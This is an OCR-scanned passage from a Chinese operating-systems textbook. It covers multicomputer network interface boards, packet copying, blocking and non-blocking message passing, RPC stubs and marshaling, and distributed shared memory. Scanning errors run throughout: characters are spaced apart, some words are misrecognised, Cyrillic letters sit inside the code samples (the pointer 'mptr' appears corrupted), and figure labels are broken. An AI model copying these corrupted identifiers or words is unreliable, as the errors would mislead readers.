一 个 交换 机 之 前 ， 这 个 要 送出 的 包 必须 被 复制 到 接口 板 的 RAM 中 。 这 样 设计 的 原因 是 许多 互连网 络 是 
同步 的 ， 所 以 一 旦 一 个 包 的 传送 开始 ， 比特 流 必 须 以 恒定 的 速率 连续 进行 。 如 果 包 在 主 RAM 中 ， 由 于 
内 存 总 线 上 有 其 他 的 信息 流 ， 所 以 这 个 送 到 网 络 上 的 连续 流 是 不 能 保证 的 。 在 接口 板 上 使 用 专门 的 
RAM ， 就 消除 了 这 个 问题 。 这 种 设计 如 图 8-18 所 示 。 


节点 ! 节点 2 


图 8-18 网 络 接口 卡 在 多 计算 机 中 的 位 置 


同样 的 问题 还 出 现在 接收 进来 的 包 上 。 从 网 络 上 到 达 的 比特 流速 率 是 恒定 的 ， 并 且 经 常 有 非常 高 的 
速率 。 如 果 网 络 接口 卡 不 能 在 它们 到 达 的 时 候 实时 存储 它们 ， 数 据 将 会 丢失 。 同 样 ， 在 这 里 试图 通过 系 
统 总 线 (例如 PCI 总 线 ) 到 达 主 RAM 是 非常 危险 的 。 由 于 网 卡通 常 插 在 PCI 总 线 上 ， 这 是 一 个 惟一 的 通 
向 主 RAM 的 连接 ， 所 以 不 可 避免 地 要 同 磁盘 以 及 每 个 其 他 的 VO 设备 竞争 总 线 。 而 把 进来 的 包 首先 保存 
在 接口 板 的 私有 RAM 中 ， 然 后 再 把 它们 复制 到 主 RAM 中 ， 则 更 安全 些 。 

接口 板 上 可 以 有 一 个 或 多 个 DMA 通 道 ， 其 至 在 板 上 有 一 个 完整 的 CPU (乃至 多 个 CPU)。 通 过 请 求 
在 系统 总 线 上 的 块 传送 (block transfer), DMA 通 道 可 以 在 接口 板 和 主 RAM 之 间 以 非常 高 的 速率 复制 包 ， 
因而 可 以 一 次 性 传送 若干 字 而 不 需要 为 每 个 字 分 别 请 求 总 线 。 不 过 ， 淮 确 地 说 ， 正 是 这 种 块 传送 ( 它 占 
用 了 系统 总 线 的 多 个 总 线 周期 ) 使 接口 板 上 的 RAM 的 需要 是 第 一 位 的 。 

很 多 接口 板 上 有 一 个 完整 的 CPU， 可 能 另外 还 有 一 个 或 多 个 DMA 通 道 。 它们 被 称 为 网 络 处 理 器 
(network processor) ， 并 且 其 功能 日 趋 强大 。 这 种 设计 意味 着 主 CPU 将 一 些 工作 分 给 了 网 卡 ， 诸 如 处 理 


312 #8 


可 靠 的 传送 (如果 底层 的 硬件 会 丢 包 )、 多 播 ( 将 包 发 送 到 多 于 一 个 的 目的 地 )、 压 缩 /解压 缩 、 加 密 / 解 
密 以 及 在 多 进程 系统 中 处 理 安全 事务 等 。 但 是 ， 有 两 个 CPU 则 意味 着 它们 必须 同步 ， 以 避免 竟 争 条 件 的 
发 生 ， 这 将 增加 额外 的 开销 ， 并 且 对 于 操作 系统 来 说 意味 着 要 承担 更 多 的 工作 。 


8.2.2 低层 通信 软件 

在 多 计算 机 系统 中 高 性 能 通信 的 敌人 是 对 包 的 过 度 复制 。 在 最 好 的 情形 下 ， 在 源 节点 会 有 从 RAM 
到 接口 板 的 一 次 复制 ， 从 源 接口 板 到 目的 接口 板 的 一 次 复制 (如 果 在 路 径 上 没有 存储 和 转发 发 生 ) 以 及 
从 目的 接口 板 再 到 目的 地 RAM 的 一 次 复制 ， 这 样 一 共有 三 次 复制 。 但 是 ， 在 许多 系统 中 情况 要 精 糕 得 
多 。 特 别 是 ， 如 果 接 口 板 被 映射 到 内 核 虚 扎 地 址 空间 中 而 不 是 用 户 虚 拟 地 址 空间 的 话 ， 用 户 进程 只 能 通 
过 发 出 一 个 陷入 到 内 核 的 系统 调用 的 方式 来 发 送 包 。 内 核 会 同时 在 输入 和 输出 时 把 包 复制 到 自己 的 存储 
空间 去 ， 从 而 在 传送 到 网 络 上 时 避免 出 现 缺 页 异常 (page fault) 。 同 样 ， 接 收 包 的 内 核 在 有 机 会 检查 包 
之 前 ， 可 能 也 不 知道 应 访 把 进来 的 包 放 置 到 哪里 。 上 述 五 个 复制 步骤 如 图 8-18 所 示 。 

如 果 说 进出 RAM 的 复制 是 性 能 瓶颈 ， 那 么 进出 内 核 的 额外 复制 会 将 端 到 端的 延迟 加 倍 ， 并 把 吞吐 量 
(throughput) 降低 一 半 。 为 了 避免 这 种 对 性 能 的 影响 ， 不 少 多 计算 机 把 接口 板 映 射 到 用 户 空间 ， 并 允许 用 
户 进程 直接 把 包 送 到 卡 上 ， 而 不 需要 内 核 的 参与 。 尽 管 这 种 处 理 确实 改善 了 性 能 ， 但 却 带 来 了 两 个 问题 。 

首先 ， 如 果 在 节点 上 有 若干 个 进程 运行 而 且 需 要 访问 网 络 以 发 送 包 ， 该 怎么 办 ? 哪 一 个 进程 应 该 在 
其 地 址 空间 中 获得 接口 板 昵 ? 映射 拥有 一 个 系统 调用 将 接口 板 映射 进出 一 个 虚拟 地 址 空间 ， 其 代价 是 很 
高 的 ， 但 是 ， 如 果 只 有 一 个 进程 获得 了 卡 ， 那 么 其 他 进程 该 如 何 发 送 包 呢 ? 如 果 网 卡 被 映射 进 了 进程 A 
的 虚拟 地 址 空间 ， 而 所 到 达 的 包 却 是 进程 B 的 ， 又 该 怎么 办 ? 尤其 是 ， 如 果 A 和 B 属 于 不 同 的 所 有 者 ， 其 
中 任何 一 方 都 不 打算 协助 另 一 方 ， 又 怎么 办 ? 

一 个 解决 方案 是 ， 把 接口 板 映射 到 所 有 需要 它 的 进程 中 去 ， 但 是 这 样 做 就 需要 有 一 个 机 制 用 以 避免 
竞争 。 例 如 ， 如 果 A 申 明 接口 板 上 的 一 个 缓冲 区 ， 而 由 于 时 间 片 ，B 开 始 运行 并 且 申 明 同一 个 缓冲 区 ， 
那么 就 会 发 生 灾 难 。 需 要 有 某 种 同步 机 制 ， 但 是 那些 诸如 互 斥 信号 量 (mutex) 一 类 的 机 制 需 要 在 进程 
会 彼此 协作 的 前 提 下 才能 工作 。 在 有 多 个 用 户 的 分 时 环境 下 ， 所 有 的 用 户 都 希望 其 工作 尽快 完成 ， 某 个 
用 户 也 许 会 锁 住 与 接口 板 有 关 的 互 斥 信号 量 而 不 肯 释 放 。 从 这 里 得 到 的 结论 是 ， 对 于 将 接口 板 映射 到 用 
户 空间 的 方案 ， 只 有 在 每 个 节点 上 只 有 一 个 用 户 进程 运行 时 才能 够 发 挥 作用 ， 否 则 必须 设置 专门 的 预防 
机 制 ( 例 如， 对 不 同 的 进程 可 以 把 接口 板 上 RAM 的 不 同 部 分 映射 到 各 自 的 地 址 空间 )。 

第 二 个 问题 是 ， 内 核 本 身 会 经 常 需要 访问 互连网 络 ， 例 如 ， 访 问 远程 节点 上 的 文件 系统 。 如 果 考 虑 
让 内 核 与 任何 用 户 共享 同一 块 接口 板 ， 即 便 是 基于 分 时 方式 ， 也 不 是 一 个 好 主意 。 假 设 当 板 被 映射 到 用 
户 空间 ， 收 到 了 一 个 内 核 的 包 ， 那 么 怎么 办 ? 或 者 若 某 个 用 户 进程 向 一 个 伪装 成 内 核 的 远程 机 器 发 送 了 
一 个 包 ， 又 该 怎么 办 ? 结论 是 ， 最 简单 的 设计 是 使 用 两 块 网 络 接口 板 ， 一 块 映射 到 用 户 空间 供应 用 程序 
使 用 ， 另 一 块 映 射 到 内 核 空间 供 操作 系统 使 用 。 许 多 多 计算 机 就 正 是 这 样 做 的 。 

节点 至 网 络 接 口 通 信 
一 个 问题 是 如 何 将 包 送 到 接口 板 上 。 最 快 的 方法 是 使 用 板 上 的 DMA 芯 片 直接 将 它们 从 RAM 复 制 
到 板 上 。 这 种 方式 的 问题 是 ，DMA 使 用 物理 地 址 而 不 是 虚拟 地 址 ， 并 且 独 立 于 CPU 运 行 。 首 先 ， 尽管 
一 个 用 户 进程 肯定 知道 它 打算 发 送 的 任何 包 所 在 的 虚拟 地 址 ， 但 它 通常 不 知道 有 关 的 物理 地 址 。 设 计 一 
个 系统 调用 进行 虚拟 地 址 到 物理 地 址 的 映射 是 不 可 取 的 ， 因 为 把 接口 板 放 到 用 户 空间 的 首要 原因 就 是 为 
了 避免 不 得 不 为 每 个 要 发 送 的 包 进行 一 次 系统 调用 。 

另外 ， 如 果 操 作 系 统 决定 替换 一 个 页 面 ， 而 DMA 芯 片 正在 从 该 页 面 复制 一 个 包 ， 就 会 传送 错误 的 
数据 。 然 而 更 加 精 糕 的 是 ， 如 果 操作 系统 在 替换 某 一 个 页 面 的 同时 DMA 芯 片 正 在 把 一 个 包 复制 进 该 页 
面 ， 结 果 不 仅 进 来 的 包 会 丢失 ， 无 带 的 存储 器 页 面 也 会 被 毁坏 。 

为 了 以 避免 上 述 问题 ， 可 采用 一 类 将 页 面 钉 住 和 释放 的 系统 调用 ， 把 有 关 页 面 标记 成 暂时 不 可 交换 
的 。 但 是 不 仅 需 要 有 一 个 系统 调用 钉 住 含有 每 个 输出 包 的 页 面 ， 还 要 有 另 一 个 系统 调用 进行 释放 工作 ， 
这 样 做 的 代价 太 大 。 如 果 包 很 小 ， 比 如 64 字 节 或 更 小 ， 就 不 能 忍受 钉 住 和 释放 每 个 缓冲 区 的 开销 。 对 于 
大 的 包 ， 比 如 说 1KB 或 更 大 ， 也 许 会 容忍 相关 开销 。 对 于 大 小 在 这 两 者 之 间 的 包 ， 就 要 取决 于 硬件 的 具 
体 情况 了 。 除 了 会 对 性 能 带 来 影响 ， 钉 住 和 释放 页 面 将 会 增加 软件 的 复杂 性 。 
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823 用 户 层 通信 软件 

在 多 计算 机 中 ， 不 同 CPU 上 的 进程 通过 互相 发 送 消息 实现 通信 。 在 最 简单 的 情况 下 ， 这 种 消息 传送 
是 暴露 给 用 户 进程 的 。 换 名 话说， 操作 系统 提供 了 一 种 发 送 和 接收 消息 的 途径 ， 而 库 过 程 使 得 这 些 低层 
的 调用 对 用 户 进程 可 用 。 在 较 复杂 的 情形 下 ， 通 过 使 得 远程 通信 看 起 来 像 过 程 调用 的 办 法 ， 将 实际 的 消 
息 传递 对 用 户 隐藏 起 来 。 下 面 将 讨论 这 两 种 方法 。 

1 .发送 和 接收 

在 最 简化 的 的 情形 下 ， 所 提供 的 通信 服务 可 以 减少 到 两 个 ( 库 ) 调用 ， 一 个 用 于 发 送 消息 ， 另 一 个 
用 于 接收 消息 。 发 送 一 条 消息 的 调用 可 能 是 

send(dest, &тріг); 
而 接收 消息 的 调用 可 能 是 

receive(addr, &тріг); 
前 者 把 由 mptr 参 数 所 指向 的 消息 发 送 给 由 dest 参 数 所 标识 的 进程 ， 并 且 引 起 对 调用 者 的 阻塞 ， 直 到 该 消 
息 被 发 出 。 后 者 引起 对 调用 者 的 阻塞 ， 直 到 消息 到 达 。 该 消息 到 达 后 ， 被 复制 到 由 mptr 参 数 所 指向 的 组 
冲 区 ， 并 且 撤 销 对 调用 者 的 阻塞 。addr 参 数 指定 了 接收 者 要 监听 的 地 址 。 这 两 个 过 程 及 其 参数 有 许多 可 
能 的 变种 。 

一 个 问题 是 如 何 编 址 。 由 于 多 计算 机 是 静态 的 ， CPU 数目 是 固定 的 ， 所 以 处 理 编 址 问题 的 最 便利 
的 办 法 是 使 addr 由 两 部 分 的 地 址 组 成 ， 其 中 一 部 分 是 CPU 编号 ， 另 一 部 分 是 在 这 个 已 编 址 的 CPU 上 的 一 
个 进程 或 端口 的 编号 。 在 这 种 方式 中 ， 每 个 CPU 可 以 管理 自己 的 地 址 而 不 会 有 潜在 的 冲突 。 

2. 阻塞 调用 和 非 阻塞 调用 

上 面 所 叙述 的 调用 是 查 宣 调用 (有 了 时 称 为 同步 调用 )。 当 一 个 进程 调用 send 时 ， 它 指定 一 个 目标 以 
及 用 以 发 送 消息 到 该 目标 的 一 个 缓冲 区 。 当 消息 发 送 时 ， 发 送 进程 被 阻塞 ( 挂 起 )。 在 消息 已 经 完全 发 
送出 去 之 前 ， 不 会 执行 跟随 在 调用 send 后 面 的 指令 ， 如 图 8-19a 所 示 。 类 似 地 ， 在 消息 真正 接收 并 且 放 入 
由 参数 指定 的 消息 缓冲 区 之 前 ， 对 receive 的 调用 也 不 会 把 控制 j 在 receive 中 进程 保持 挂 起 状态 ， 直 
到 消息 到 达 为 止 ， 这 甚至 有 可 能 等 待 若干 小 时 。 在 有 些 系统 中 ， 接 收 者 可 以 指定 希望 从 谁 处 接收 消息 ， 
在 这 种 情况 下 接收 者 就 保持 阻塞 状态 ， 直 到 来 自 那个 发 送 者 的 消息 到 达 为 止 。 


发 送 者 被 阻塞 


发 送 者 运行 上 
[клин | 
заана 从 内 核 返回 ， 
| 一 消息 正在 被 发 送 —— 发 送 者 被 释放 

а) 


| 一 一 一 ~ 一 一 消息 正在 被 发送 一 | 
消息 被 复 
制 到 内 术 
缓冲 区 


b) 
图 8-19 а) 一 个 阻塞 的 send 调 用 ，b) 一 个 非 阻塞 的 send 调 用 
相对 于 阻塞 调用 的 另 一 种 方式 是 非 阻 室 调 用 (有 时 称 为 异步 调用 ) 。 如 果 send 是 非 阻塞 的 ， 在 消息 
发 出 之 前 ， 它 立即 将 控制 返回 给 调用 者 。 这 种 机 制 的 优点 是 发 送 进程 可 以 继续 运算 ， 与 消息 传送 并 行 ， 
而 不 是 让 CPU 空 亲 (假设 没有 其 他 可 运行 的 进程 ) 。 通常 是 由 系统 设计 者 做 出 在 阻塞 原 语 和 非 阻塞 原 语 
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之 间 的 选择 (或 者 使 用 这 种 原 语 或 者 另 一 种 原 语 ) ， 当 然 也 有 少数 系统 中 两 种 原 语 同时 可 用 ， 而 让 用 户 
决定 其 喜好 。 

但 是 ， 非 阻塞 原 语 所 提供 的 性 能 优点 被 其 严重 的 缺点 所 抵消 了 : 直到 消息 被 送出 发 送 者 才能 修改 消 
息 缓 冲 区 。 进 程 在 传输 过 程 中 重 写 消息 的 后 果 是 如 此 可 怕 以 致 不 得 不 慎重 考虑 。 更 精 的 是 ， 发 送 进程 不 
知道 传输 何 时 会 结束 ， 所 以 根本 不 知道 什么 时 候 重用 缓冲 区 是 安全 的 。 不 可 能 永远 避免 再 碰 缓 冲 区 。 

有 三 种 可 能 的 解决 方案 。 第 一 种 方案 是 ， 让 内 核 复制 这 个 消息 到 内 部 的 内 核 缓冲 区 ， 然 后 让 进程 继 
续 ， 如 图 8-19b 所 示 。 从 发 送 者 的 观点 来 看 ， 这 个 机 制 与 阻塞 调用 相同 : 只 要 进程 获得 控制 ， 就 可 以 随 
意 重用 缓冲 区 了 。 当 然 ， 消 息 还 没有 发 送出 去 ， 但 是 发 送 者 是 不 会 被 这 种 情况 所 妨碍 的 。 这 个 方案 的 缺 
点 是 对 每 个 送出 的 消息 都 必须 将 其 从 用 户 空间 复制 进 内 核 空间 。 面 对 大 量 的 网 络 接口 ， 消 息 最 终 要 复制 
进 硬件 的 传输 缓冲 区 中 ， 所 以 第 一 次 的 复制 实质 上 是 浪费 。 额 外 的 复制 会 明显 地 降低 系统 的 性 能 。 

第 二 种 方案 是 ， 当 消息 发 送 之 后 中 断 发 送 者 ， 告 知 缓冲 区 又 可 以 使 用 了 。 这 里 不 需要 复制 。 从 而 节 
省 了 时 间 ， 但 是 用 户 级 中 断 使 编写 程序 变 得 杯 手 ， 并 可 能 会 要 处 理 竞争 条 件 ， 这 些 都 使 得 该 方案 难以 设 
计 并 且 几 乎 无 法 调试 。 

第 三 种 方案 是 ， 让 缓冲 区 写 时 复制 (сору on write) ， 也 就 是 说 ， 在 消息 发 送出 去 之 前 将 其 标记 为 只 
读 。 在 消息 发 送出 去 之 前 ， 如 果 缓 冲 区 被 重用 ， 则 进行 复制 。 这 个 方案 的 问题 是 ， 除 非 缓冲 区 被 孤立 在 
自己 的 页 面 上 ， 否 则 对 临近 变量 的 写 操作 也 会 导致 复制 。 此 外 ， 需 要 有 额外 的 管理 ， 因 为 这 样 的 发 送 消 
息 行为 隐 含 着 对 页 面 读 / 写 状态 的 影响 。 最 后 ， 该 页 面 迟 早 会 再 次 被 写 人 ， 它 会 触发 一 次 不 再 必要 的 复制 。 

这 样 ， 在 发 送 端的 选择 是 

1) 阻塞 发 送 (CPU 在 消息 传输 期 间 空 闲 ) 。 

2) 带 有 复制 操作 的 非 阻塞 发 送 (CPU 时 间 浪 费 在 额外 的 复制 上 ) 。 

З) 带 有 中 断 操作 的 非 阻塞 发 送 (造成 编程 困难 ) 。 

4) 写 时 复制 (最 终 可 能 也 会 需要 额外 的 复制 )。 

在 正常 条 件 下 ， 第 一 种 选择 是 最 好 的 ， 特 别 是 在 有 多 线程 的 情况 下 ， 此 时 当 一 个 线程 由 于 试图 发 送 被 阻 
塞 后 ， 其 他 线程 还 可 以 继续 工作 。 它 也 不 需要 管理 任何 内 核 缓冲 区 。 而且， 正如 将 图 8-19a 和 图 8-19b 进 
行 比较 所 见 到 的 ， 如 果 不 需要 复制 ， 通 常 消息 会 被 更 快 地 发 出 。 

请 注意 ， 有 必要 指出 ， 有 些 作者 使 用 不 同 的 判别 标准 区 分 同步 和 异步 原 语 。 另 一 种 观点 认为 ， 只 有 
发 送 者 一 直 被 阻塞 到 消息 已 被 接收 并 且 有 响应 发 送 回来 时 为 止 ， 才 是 同步 的 (Andrews，1991) 。 但 是 ， 
在 实时 通信 领域 中 ， 同 步 有 着 其 他 的 含义 ， 不 幸 的 是 ， 它 可 能 会 导致 混淆。 

正如 send 可 以 是 阻塞 的 和 非 阻塞 的 一 样 ，receive 也 同样 可 以 是 阻塞 的 和 非 阻塞 的 。 阻 塞 调 用 就 是 挂 
起 调用 者 直到 消息 到 达 为 止 。 如 果 有 多 线程 可 用 ， 这 是 一 种 简单 的 方法 。 另 外 ， 非 阻塞 receive 只 是 通知 内 
核 缓冲 区 所 在 的 位 置 ， 并 几乎 立即 返回 控制 。 可 以 使 用 中 断 来 告知 消息 已 经 到 达 。 然 而 ， 中 断 方式 编程 
困难 ， 并 且 速 度 很 慢 ， 所 以 也 许 对 于 接收 者 来 说 ， 更 好 的 方法 是 使 用 一 个 过 程 poll 轮 询 进来 的 消息 。 该 过 
程 报告 是 否 有 消息 正在 等 待 。 若 是 ， 调 用 者 可 调用 get_message， 它 返回 第 一 个 到 达 的 消息 。 在 有 些 系统 
中 ， 编 译 器 可 以 在 代码 中 合适 的 地 方 插入 poll 调 用 ， 不 过 ， 要 掌握 以 怎样 的 频 度 使 用 poll 则 是 需要 技巧 的 。 

还 有 另 一 个 选择 ， 其 机 制 是 在 接收 者 进程 的 地 址 空间 中 ， 一 个 消息 的 到 达 自然 地 引起 一 个 新 线程 的 
创建 。 这 样 的 线程 称 为 弹出 式 线程 (pop-up thread) 。 这 个 线程 运行 一 个 预定 义 的 过 程 ， 其 参数 是 一 个 指 
向 进来 消息 的 指针 。 在 处 理 完 这 个 消息 之 后 ， 该 线程 直接 退出 并 被 自动 撤销 。 

这 一 想法 的 变种 是 ， 在 中 断 处 理 程序 中 直接 运行 接收 者 代码 ， 从 而 避免 了 创建 弹出 线程 的 麻烦 。 要 
使 这 个 方法 更 快 ， 消 息 自身 可 以 带 有 该 处 理 程序 的 句柄 (handler) ， 这 样 当 消息 到 达 时 ， 只 在 少数 几 个 
指令 中 可 以 调用 处 理 程序 。 这 样 做 的 最 大 好 处 在 于 再 也 不 需要 复制 了 。 处 理 程序 从 接口 板 取 到 消息 并 且 
即时 处 理 。 这 种 方式 称 为 主动 消息 (active messages，Von Eicken 等 人 ，1992)。 由 于 每 条 消息 中 都 有 处 
理 程序 的 句柄 ， 主 动 消息 方式 只 能 在 发 送 者 和 接收 者 彼此 完全 信任 的 条 件 下 工作 。 

8.2.4 远程 过 程 调 用 


尽管 消息 传递 模型 提供 了 一 种 构造 多 计算 机 操作 系统 的 便利 方式 ， 但 是 它 有 不 可 救 药 的 缺陷 ， 构 造 
所 有 通信 的 范 型 (paradigm) 都 是 输入 /输出 。 过 程 send 和 receive 基本 上 在 做 UO 工 作 ， 而 许多 人 认为 
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IJ/O 就 是 一 种 错误 的 编程 模型 。 

这 个 问题 很 早 就 为 人 所 知 ， 但 是 一 直 没 有 什么 进展 ， 直 到 Birrell 和 Nelson 在 其 论文 (Birrell 和 
Nelson, 1984) 中 引进 了 一 种 完全 不 同 的 方法 来 解决 这 个 问题 。 尽 管 其 思想 是 令 人 吃惊 的 简单 (曾经 有 
人 想到 过 )， 但 其 含义 却 相当 精妙 。 在 本 节 中 ， 我 们 将 讨论 其 概念 、 实 现 、 优 点 以 及 缺点 。 

简 言 之 ，Birrell 和 Nelson 所 建议 的 是 ， 允 许 程序 调用 位 于 其 他 CPU 中 的 过 程 。 当 机 器 1 的 进程 调用 
机 器 2 的 过 程 时 ， 在 机 器 1 中 的 调用 进程 被 挂 起 ， 在 机 器 2 中 被 调用 的 过 程 执行 。 可 以 在 参数 中 传递 从 调 
用 者 到 被 调用 者 的 信息 ， 并 且 可 在 过 程 的 处 理 结果 中 返回 信息 。 根 本 不 存在 对 程序 员 可 见 的 消息 传递 或 
IO。 这 种 技术 即 是 所 谓 的 远程 过 程 调用 (Remote Procedure Call，RPC) ， 并 且 已 经 成 为 大 量 多 计算 机 
的 软件 的 基础 。 习 惯 上 ， 称 发 出 调用 的 过 程 为 客户 机 ， 而 称 被 调用 的 过 程 为 服务 器 ， 我 们 在 这 里 也 将 采 
用 这 些 名 称 。 

RPC 背 后 的 思想 是 尽 可 能 使 远程 过 程 调用 像 本 地 调用 。 在 最 简单 的 情形 下 ， 要 调用 一 个 远程 过 程 ， 
客户 程序 必须 被 绑 定 在 一 个 称 为 客户 闹 术 (client stub) 的 小 型 库 过 程 上 ， 它 在 客户 机 地 址 空间 中 代表 
服务 器 过 程 。 类 似 地 ， 服 务 器 程序 也 绑 定 在 一 个 称 为 服务 器 端 桩 (server stub) 的 过 程 上 。 这 些 过程 隐 
藏 了 这 样 一 个 事实 ， 即 从 客户 机 到 服务 器 的 过 程 调用 并 不 是 本 地 调用 。 

进行 RPC 的 实际 步骤 如 图 8-20 所 示 。 第 1 步 是 客户 机 调用 客户 端 柱 。 该 调用 是 一 个 本 地 调用 ， 其 参 
数 以 通常 方式 压 人 栈 内 。 第 2 步 是 客户 端 柱 将 有 关 参 数 打包 成 一 条 消息 ， 并 进行 系统 调用 来 发 出 该 消息 。 
这 个 将 参数 打包 的 过 程 称 为 编排 (marshaling)。 第 3 步 是 内 核 将 该 消息 从 客户 机 发 给 服务 器 。 第 4 步 是 内 
核 将 接收 进来 的 消息 传送 给 服务 器 端 柱 (通常 服务 器 端 柱 已 经 提前 调用 了 receive) 。 最 后 ， 第 5 步 是 服务 
器 端 村 调用 服务 器 过 程 。 应 答 则 是 在 相反 的 方向 沿 着 同一 步骤 进行 。 


客户 机 CPU 服务 器 CPU 


图 8-20 进行 远程 过 程 调 用 的 步骤 。 桩 用 灰色 表示 

这 里 需要 说 明 的 关键 是 由 用 户 编写 的 客户 机 过 程 ， 只 进行 对 客户 端 柱 的 正常 (本地) 调用 ， 而 客户 
端 桩 与 服务 器 过 程 同 名 。 由 于 客户 机 过 程 和 客户 端 柱 在 同一 个 地 址 空间 ， 所 以 有 关 参 数 以 正常 方式 传递 。 
类 似 地 ,服务 器 过 程 由 其 所 在 的 地 址 空间 中 的 一 个 过 程 用 它 所 期 望 的 参数 进行 调用 。 对 服务 器 过 程 而 言 ， 
一 切 都 很 正常 。 通 过 这 种 方式 ， 不 采用 带 有 send 和 receive 的 IO， 通 过 伪造 一 个 普通 的 过 程 调 用 而 实现 了 
远程 通信 。 

实现 相关 的 问题 

无 论 RPC 的 概念 是 如 何 优雅 ， 但 是 “在 草丛 中 仍然 有 几 条 蛇 隐藏 着 "。 一 大 条 就 是 有 关 指针 参数 的 
使 用 。 通 常 ， 给 过 程 传递 一 个 指针 是 不 存在 问题 的 。 由 于 两 个 过 程 都 在 同一 个 虚拟 地 址 空间 中 ， 所 以 被 
调用 的 过 程 可 以 使 用 和 调用 者 同样 的 方式 来 运用 指针 。 但 是 ， 由 于 客户 机 和 服务 器 在 不 同 的 地 址 空间 中 ， 
所 以 用 RPC 传 递 指针 是 不 可 能 的 。 

在 某 些 情形 下 ， 可 以 使 用 一 些 技巧 使 得 传递 指针 成 为 可 能 。 假 设 第 一 个 参数 是 一 个 指针 ， 它 指向 一 
个 整数 :。 客 户 端 桩 可 以 编排 :并 把 它 发 送 给 服务 器 。 然后 服务 器 端 柱 创建 一 个 指向 k 的 指针 并 把 它 传递 
给 服务 器 过 程 ， 这 正如 服务 器 所 期 望 的 一 样 。 当 服务 器 过 程 把 控制 返回 给 服务 器 端 杜 后 ， 后 者 把 k 送 回 
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客户 机 ， 这 里 新 的 k 覆 盖 了 原来 旧 的 ， 只 是 因为 服务 器 修改 了 它 。 实 际 上 ， 通 过 引用 调用 (call-by- 
reference) 的 标准 调用 序列 被 复制 -恢复 (copy-restore) 所 替代 了 。 然 而 不 幸 的 是 ， 这 个 技巧 并 不 是 总 
能 正常 工作 的 ， 例 如 ， 如 果 要 把 指针 指向 一 幅 图 像 或 其 他 的 复杂 数据 结构 就 不 行 。 由 于 这 个 原因 ， 对 于 
被 远程 调用 的 过 程 而 言 ， 必 须 对 参数 做 出 某 些 限制 。 

第 二 个 问题 是 ， 对 于 弱 类 型 的 语言 ， 如 C 语 言 ， 编 写 一 个 过 程 用 于 计算 两 个 矢量 (数组 ) 的 内 积 且 
不 规定 其 任何 一 个 矢量 的 大 小 ， 这 是 完全 合法 的 。 每 个 矢量 可 以 由 一 个 指定 的 值 所 终止 ， 而 只 有 调用 者 
和 被 调用 的 过 程 掌 担 该 值 。 在 这 样 的 条 件 下 ， 对 于 客户 端 桩 而 言 ， 基 本 上 没有 可 能 对 这 种 参数 进行 编排 ; 
没有 办 法 能 确定 它们 有 多 大 。 

第 三 个 人 ， 参 数 的 类 型 并 不 总 是 能 够 推导 出 的 ， 甚 至 不 论 是 从 形式 化 规约 还 是 从 代码 自身 。 这 
方面 的 一 个 例子 是 printf， 其 参数 的 数量 可 以 是 任意 的 至 少 一 个 )， 而 且 它们 的 类 型 可 以 是 整形 、 短 整 
形 、 长 整形 、 字 符 、 字 符 串 、 各 种 长 度 的 浮 点 数 以 及 其 他 类 型 的 任意 混合 。 试 图 把 printf 作 为 远程 过 程 
调用 实际 上 是 不 可 能 的 ， 因 为 C 是 如 此 的 宽松 。 然而， 如果 有 一 条 规则 说 假如 你 不 使 用 C 或 者 C++ 来 进行 
编程 才能 使 用 RPC， 那 么 这 条 规则 是 不 会 受 欢迎 的 。 

第 四 个 问题 与 使 用 全 局 变量 有 关 。 通 常 ， 调 用 者 和 被 调用 过 程 除了 使 用 参数 之 外 ， 还 可 以 通过 全 局 
变量 通信 。 如 果 被 调用 过 程 此 刻 被 移 到 远程 机 器 上 ， 代 码 将 失效 ， 因 为 全 局 变量 不 再 是 共享 的 了 。 

这 里 所 叙述 的 问题 并 不 表示 RPC 就 此 无 望 了 。 事 实 上 ，RPC 被 广泛 地 使 用 ， 不 过 在 实际 中 为 了 使 
RPC 正 常 工作 需要 有 一 些 限制 和 仔细 的 考虑 。 


8.2.5 分 布 式 共享 存储 器 

虽然 RPC 有 它 的 吸引 力 ， 但 即便 是 在 多 计算 机 里 ， 很 多 程序 员 仍 旧 偏爱 共享 存储 器 的 模型 并 且 愿 意 
使 用 它 。 让 人 相当 吃惊 的 是 ,采用 一 种 称 为 分 布 式 共享 存储 器 (Distributed Shared Memory, DSM) (Li, 
1986; Li 和 Hudak 1989) 的 技术 ， 就 有 可 能 很 好 地 保留 共享 存储 器 的 幻觉 ， 尽 管 这 个 共享 存储 器 实际 
并 不 存在 。 有 了 DSM， 每 个 页 面 都 位 于 如 图 8-1 所 示 的 某 一 个 存储 器 中 。 每 台 机 器 有 其 自 己 的 虚拟 内 存 
和 页 表 。 当 一 个 CPU 在 一 个 它 并 不 拥有 的 页 面 上 进行 LOAD 和 STORE 时 ， 会 陷 人 到 操作 系统 当中 
操作 系统 对 该 页 面 进行 定位 ， 并 请 求 当 前 持 有 该 页 面 的 CPU 解除 对 该 页 面 的 映射 并 通过 互连网 络 
页 面 。 在 该 页 面 到 达 时 ， 页 面 被 映射 进来 ， 于 是 出 错 指令 重新 启动 。 事 实 上 ， 操 作 系统 只 是 从 远程 
RAM 中 而 不 是 从 本 地 磁盘 中 满足 了 这 个 缺 页 异常 。 对 用 户 而 言 ， 机 器 看 起 来 拥有 共享 存储 器 。 

实际 的 共享 存储 器 和 DSM 之 间 的 差别 如 图 8-21 所 示 。 在 图 8-21a 中 ， 是 一 台 配 有 通过 硬件 实现 的 物 
理 共享 存储 器 的 真正 的 多 处 理 机 。 在 图 8-21b 中 ， 是 由 操作 系统 实现 的 DSM。 在 图 8-21c 中 ， 我 们 看 到 另 
一 种 形式 的 共享 存储 器 ， 它 通过 更 高 层次 的 软件 实现 。 在 本 章 的 后 面部 分 ， 我 们 会 讨论 第 三 种 方式 ,不 
过 现在 还 是 专注 于 讨论 DSM。 

先 考察 一 些 有 关 DSM 是 如 何 工作 的 细节 。 在 DSM 系 统 中 ， 地 址 空间 被 划分 为 页 面 (page) ， 这 些 页 
面 分 布 在 系统 中 的 所 有 节点 上 。 当 一 个 CPU 引用 一 个 非 本 地 的 地 址 时 ， 就 产生 一 个 陷阱 ，DSM 软 件 调 取 
包含 该 地 址 的 页 面 并 重新 开始 出 错 指令 。 该 指令 现在 可 以 完整 地 执行 了 。 这 一 概念 如 图 8-22a 所 示 ， 该 
系统 配 有 16 个 页 面 的 地 址 空间 ，4 个 节点 ， 每 个 节点 能 持 有 6 个 页 面 。 

在 这 个 例子 中 ， 如 果 CPU 0 引用 的 指令 或 数据 在 页 面 0、2、5 或 9 中 ， 那 么 引用 在 本 地 完成 。 引用 其 
